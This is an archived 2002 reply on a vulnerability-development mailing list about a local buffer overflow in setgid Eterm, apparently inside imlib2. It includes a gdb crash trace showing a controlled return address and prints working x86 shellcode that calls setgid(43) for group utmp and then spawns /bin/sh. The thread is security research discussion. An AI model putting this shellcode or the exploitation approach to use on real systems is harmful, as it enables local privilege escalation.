Vulnerability Development mailing list archives
Re: Eterm SGID utmp Buffer Overflow (Local)
From: Charles 'core' Stevenson <core () bokeoa com>
Date: Tue, 15 Jan 2002 02:32:30 -0700
Simon 'corecode' Schubert wrote:
I found this last night looking for suids to overflow. Tested on Debian PowerPC Unstable. Yields gid utmp from which higher priveleges could be gained with a little effort. I haven't looked too close but I think the overflow might be in imlib2.could this be sploited under x86 as well? i don't see a way but this doesn't say anything... what do others say?
I'm not getting anywhere with it on x86 as far as the overflow goes. There may be other problems... it looks in $HOME/.loaders/image so it's possible there could be symlink attacks etc.. Program received signal SIGSEGV, Segmentation fault. 0x400b63ca in __imlib_ListLoaders () from /usr/lib/libImlib2.so.1 (gdb) bt #0 0x400b63ca in __imlib_ListLoaders () from /usr/lib/libImlib2.so.1 #1 0x41414141 in ?? () Cannot access memory at address 0x41414141 Here's a modified version of Aleph One's execve /bin/sh that does setgid utmp. Might be usefull to someone. char shellcode[] = /* setgid(43) utmp on Debian */ "\x6a\x2b" /* 80483e0: 6a 2b push $0x2b */ "\x5b" /* 80483e2: 5b pop %ebx */ "\x6a\x2e" /* 80483e3: 6a 2e push $0x2e */ "\x58" /* 80483e5: 58 pop %eax */ "\xcd\x80" /* 80483e6: cd 80 int $0x80 */ /* execve /bin/sh by Aleph One */ "\xeb\x1f\x5e\x89\x76\x08\x31\xc0\x88\x46\x07\x89\x46\x0c\xb0\x0b" "\x89\xf3\x8d\x4e\x08\x8d\x56\x0c\xcd\x80\x31\xdb\x89\xd8\x40\xcd" "\x80\xe8\xdc\xff\xff\xff/bin/sh"; Best Regards, Charles Stevenson
cheerz corecode -- /"\ http://corecode.ath.cx/ \ / \ ASCII Ribbon Campaign / \ Against HTML Mail and News ------------------------------------------------------------------------ Part 1.2Type: application/pgp-signature
Current thread:
- Eterm SGID utmp Buffer Overflow (Local) Charles 'core' Stevenson (Jan 13)
- Re: Eterm SGID utmp Buffer Overflow (Local) Simon 'corecode' Schubert (Jan 14)
- Re: Eterm SGID utmp Buffer Overflow (Local) Charles 'core' Stevenson (Jan 15)
- Re: Eterm SGID utmp Buffer Overflow (Local) Michael Jennings (Jan 21)
- Re: Eterm SGID utmp Buffer Overflow (Local) Simon 'corecode' Schubert (Jan 14)